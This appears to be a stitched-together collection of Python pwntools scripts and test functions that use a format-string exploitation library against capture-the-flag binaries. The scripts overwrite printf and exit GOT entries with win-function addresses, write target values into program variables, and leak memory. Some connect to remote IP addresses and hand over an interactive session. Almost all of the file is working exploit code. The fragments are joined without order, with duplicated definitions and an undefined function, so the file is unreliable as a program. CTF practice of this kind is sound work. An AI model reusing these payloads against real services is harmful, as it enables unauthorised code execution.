def test_win():
    """Point printf's GOT entry at the hard-coded target and check the flag line comes back.

    Relies on the module-level ``connect``, ``exec_fmt``, ``elf`` and the global
    ``p`` that ``connect`` rebinds.
    """
    target = 0x4008DA  # address baked in for this specific binary
    connect()
    writer = FormatString(exec_fmt, elf=elf, index=6, pad=0, explore_stack=False)
    # 8-byte write of the target address into the printf GOT slot.
    writer.write_q(elf.symbols['got.printf'], target)
    for line in ("2", ""):
        p.sendline(line)
    out = p.recvline()
    assert "This_is_the_flag" in out
def startIt():
    """Launch the target binary and wrap it in a fresh FormatString helper.

    Rebinds the module globals ``p`` (the pwntools process) and ``fmtStr``.
    ``SCRIPTDIR``, ``fName``, ``exec_fmt`` and ``elf`` come from elsewhere in the file.
    """
    global p, fmtStr
    binary_path = os.path.join(SCRIPTDIR, fName)
    p = process(binary_path, buffer_fill_size=0xffff)
    # Consume the prompt so later sends start from a known position.
    p.recvuntil("Input: ")
    fmtStr = FormatString(exec_fmt, elf=elf)
import IPython
import logging

logging.basicConfig(level=logging.DEBUG)
log = logging.getLogger()

fName = "./deardiary"
elf = ELF(fName)


# For deardiary
def exec_fmt(s):
    """Run one round-trip against deardiary with ``s`` as the stored entry and return what is printed back.

    A new process is started on every call and closed before returning; the
    module global ``p`` is rebound to it.
    """
    global p
    p = process(fName, buffer_fill_size=0xffff)
    # Menu choice 1 followed by the payload, then choice 2 to read the result back
    # (menu meanings assumed from the prompts the script waits for).
    p.recvuntil("quit")
    for line in ("1", s):
        p.sendline(line)
    p.recvuntil("quit")
    p.sendline("2")
    p.recvuntil(">")
    captured = p.recvuntil("1.", drop=True)
    p.recvuntil("quit")
    p.close()
    return captured


fmtStr = FormatString(exec_fmt, elf=elf)
print(fmtStr.leak.s(elf.symbols['data']))
context.binary = elf


def connect():
    """Start the target locally (remote line left commented) and sync to the menu.

    Rebinds the module global ``p``.
    """
    global p
    p = process(elf.file.name)
    #p = remote("146.185.132.36",19153)
    p.recvuntil("Exit the battle \n")


def exec_fmt(s):
    """Submit ``s`` through menu option 2 and return the output printed before the menu repeats."""
    print("Sending: " + repr(s))
    p.sendline("2")
    sleep(0.1)  # presumably gives the program time to consume the choice first
    p.sendline(s)
    reply = p.recvuntil("1. Stack Bufferoverflow Bug", drop=True)
    p.recvuntil("Exit the battle \n")
    return reply


winner = 0x4008DA  # address baked in for this specific binary
connect()
fmtStr = FormatString(exec_fmt, elf=elf, index=6, pad=0, explore_stack=False)
# 8-byte write of ``winner`` into the printf GOT slot.
fmtStr.write_q(elf.symbols['got.printf'], winner)
p.sendline("2")
p.interactive()
def test_it():
    """Check that indexed reads through the helper return the expected memory contents (str form)."""
    reader = FormatString(exec_fmt, elf=elf)
    secret_addr = elf.symbols['secret']
    logged_in_addr = elf.symbols['loggedIn']
    assert reader[secret_addr] == 'This is my super secret string!'
    assert reader[logged_in_addr] == "\x00"
#!/usr/bin/env python
from formatStringExploiter.FormatString import FormatString
from pwn import *


def exec_fmt(s, echo=True):
    """Run ./hacker_level once with ``s`` as input and return what it prints after "Hello, ".

    Args:
        s: the line sent to the program.
        echo: when true, print the captured output for inspection.
    """
    proc = process("./hacker_level", buffer_fill_size=0xffff)
    proc.sendline(s)
    # Drop the greeting; everything after it is the part we return.
    proc.recvuntil("Hello, ", drop=True)
    captured = proc.recvall()
    if echo:
        print(captured)
    # One process per call, so tear it down before returning.
    proc.close()
    return captured


elf = ELF("./hacker_level")
fmtStr = FormatString(exec_fmt, elf=elf)
fmtStr.write_d(elf.symbols['level'], 0xCCC31337)
# print elf
print(hex(elf.got['exit']))
get_secret = 0x08048713  # address baked in for this specific binary
print(hex(get_secret))


def exec_fmt(s):
    """Drive one local run: log in, submit ``s``, log in again, return the captured output."""
    proc = elf.process()
    # p =remote('problem1.tjctf.org',8008)
    proc.recv()
    password = '******'  # value exactly as given in the source (looks redacted)
    proc.sendline(password)
    proc.recv()
    proc.sendline(s)
    proc.recvuntil('> ', drop=True)
    proc.sendline(password)
    captured = proc.recvuntil('\n\nTada!', drop=True)
    print(proc.recvall())
    return captured


fmtStr = FormatString(exec_fmt, elf=elf, explore_stack=False)
# fmtStr.printStack()
fmtStr.write_d(elf.got['exit'], get_secret + 65537)
#!/usr/bin/env python
from formatStringExploiter.FormatString import FormatString
from pwn import *
import IPython


def exec_fmt(s):
    """Run ./fermat with ``s`` as its first argument and return everything it prints.

    Rebinds the module global ``p`` to the new process.
    """
    global p
    print("executing: " + repr(s))
    p = process(["./fermat", s], buffer_fill_size=0xffff)
    return p.recvall()


elf = ELF("./fermat")
fmtStr = FormatString(exec_fmt, elf=elf)
fmtStr.write_word(elf.symbols['secret'], 0x539)
IPython.embed()
def test_it():
    """Check that leak.s / leak.b return the expected memory contents (bytes form)."""
    reader = FormatString(exec_fmt, elf=elf)
    secret_addr = elf.symbols['secret']
    logged_in_addr = elf.symbols['loggedIn']
    assert reader.leak.s(secret_addr) == b'This is my super secret string!'
    assert reader.leak.b(logged_in_addr) == 0
from formatStringExploiter.FormatString import FormatString

elf = ELF('./secure')
print(hex(elf.got['exit']))
get_secret = 0x08048713  # address baked in for this specific binary
print(hex(get_secret))


def exec_fmt(s):
    """Drive one local run: log in, submit ``s``, log in again, return the captured output."""
    proc = elf.process()
    print("executing: " + repr(s))
    # p = remote('problem1.tjctf.org',8008)
    proc.recv()
    password = '******'  # value exactly as given in the source (looks redacted)
    proc.sendline(password)
    proc.recv()
    proc.sendline(s)
    proc.recvuntil('> ', drop=True)
    proc.sendline(password)
    captured = proc.recvuntil('\n\nTada!', drop=True)
    print(proc.recvall())
    return captured


fmtStr = FormatString(exec_fmt, elf=elf, explore_stack=False)
print(fmtStr.write_d(elf.got['exit'], get_secret + 0x10001))
#p=process('mary_morton')
p = remote("111.198.29.45", 44435)
elf = ELF('mary_morton')
libc = ELF('libc-2.23.so')  # loaded but not referenced anywhere in this fragment
context.clear(arch='amd64')

taraddr = 0x4008da  # address baked in for this specific binary
print_addr = elf.got['printf']
print("printf_addr:" + hex(print_addr))
print(p.recv())


def exec_fmt(s):
    """Send ``s`` via menu option 2 on the open connection and return the reply up to the next menu."""
    p.sendline('2')
    sleep(0.1)  # presumably gives the program time to consume the choice first
    p.sendline(s)
    return p.recvuntil('1. ', drop=True)


#print fmt('aaaa')
fmt = FormatString(exec_fmt, elf=elf, index=6)
# 8-byte write of ``taraddr`` into the printf GOT slot.
fmt.write_qword(print_addr, taraddr)
print(p.recv())
p.sendline('1')
p.interactive()
#print offset
def remote_atk(pl):
    """Open the remote service, send ``pl`` as the name, then hand the session to the user."""
    with remote('163.172.176.29', 9035) as conn:
        conn.recvuntil('pwner, whats your name?\n')
        conn.sendline(pl)
        conn.recvuntil('Till then Bye')
        conn.interactive()


#fmtStr = FormatString(exec_fmt, elf=elf)
# index = 10
# pad = 0
# {'max_explore': 64, 'already_written': 1, 'index': 10, 'arch': 'i386', 'bad_chars': '\n', 'elf': ELF('/media/sd128/sdcard/ctf/backdoor/32_new'), 'leak': pwnlib.memleak.MemLeak(<bound method FormatString._leak of <formatStringExploiter.FormatString.FormatString instance at 0x7f9a4db16bd8>>, search_range=20, reraise=True), 'pad': 0, 'endian': 'little', 'padChar': 'C', 'bits': 32, 'stack': [0, 134514964, 4287639208, 1, 4148418072, 878, 4148127336, 4288161396, 4294223700, 4294281328, 1246382666, 607203621, 1246382704, 134220362, 4148590104, 725871085, 4147803752, 4148010770, 22683471, 4291817104, 4292129648, 878, 4151142496, 0, 4294967295, 4151212128, 4149479868, 4151994464, 0, 0, 6, 4151131424, 4152049433, 0, 4152130256, 4292899208, 4290620128, 4151290523, 134513148, 4293949144, 4151720564, 2, 4152046640, 1, 0, 1, 4152199448, 4151566800, 4151689224, 4151902848, 4151410696, 4294738648, 4151880780, 4151888258, 4151115784, 0, 4152123392, 4152051992, 4292519760, 134513630, 1663069007, 745303919, 1869574944, 1702305902], 'exec_fmt': <function exec_fmt at 0x7f9a50914230>}
# print vars(fmtStr)
# 0x84a8751
# 0x804870b

# Symbol addresses resolved from the ELF; printed for inspection.
flag = elf.symbols['_Z4flagv']
#flag = 0x7be86c5
# 0x61a761a7
print(hex(flag))
exit_got = elf.symbols['got.exit']
print(hex(exit_got))
printf_plt = elf.symbols['got.printf']
print(hex(printf_plt))

#payload = fmtstr_payload(10, {exit_got: flag})
# attack(payload)
# ``attack`` is not defined in this fragment; it must come from elsewhere in the file.
payload = FormatString(attack, elf=elf, index=10, explore_stack=False)
payload.write_q(exit_got, flag)